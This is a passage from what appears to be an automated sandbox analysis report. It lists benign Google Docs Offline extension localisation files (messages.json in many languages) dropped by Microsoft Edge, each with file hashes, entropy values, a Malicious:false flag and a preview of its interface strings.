                                                                                        SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                        MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                        SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                        SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                        SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\es_419\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):959
                                                                                        Entropy (8bit):4.570019855018913
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                        MD5:535331F8FB98894877811B14994FEA9D
                                                                                        SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                        SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                        SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\et\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):968
                                                                                        Entropy (8bit):4.633956349931516
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                        MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                        SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                        SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                        SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\eu\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):838
                                                                                        Entropy (8bit):4.4975520913636595
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                        MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                        SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                        SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                        SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\fa\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1305
                                                                                        Entropy (8bit):4.673517697192589
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                        MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                        SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                        SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                        SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\fi\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):911
                                                                                        Entropy (8bit):4.6294343834070935
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                        MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                        SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                        SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                        SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\fil\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):939
                                                                                        Entropy (8bit):4.451724169062555
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                        MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                        SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                        SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                        SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\fr\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):977
                                                                                        Entropy (8bit):4.622066056638277
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                        MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                        SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                        SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                        SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):972
                                                                                        Entropy (8bit):4.621319511196614
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                        MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                        SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                        SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                        SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\gl\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):990
                                                                                        Entropy (8bit):4.497202347098541
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                        MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                        SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                        SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                        SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\gu\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1658
                                                                                        Entropy (8bit):4.294833932445159
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                        MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                        SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                        SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                        SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\hi\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1672
                                                                                        Entropy (8bit):4.314484457325167
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                        MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                        SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                        SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                        SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\hr\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):935
                                                                                        Entropy (8bit):4.6369398601609735
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                        MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                        SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                        SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                        SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\hu\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):1065
                                                                                        Entropy (8bit):4.816501737523951
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                        MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                        SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                        SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                        SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\hy\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):2771
                                                                                        Entropy (8bit):3.7629875118570055
                                                                                        Encrypted:false
                                                                                        SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                        MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                        SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                        SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                        SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\id\messages.json

                                                                                        Download File
                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):858
                                                                                        Entropy (8bit):4.474411340525479
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                        MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7944_1741031000\CRX_INSTALL\_locales\is\messages.json

                                                                                        Download File
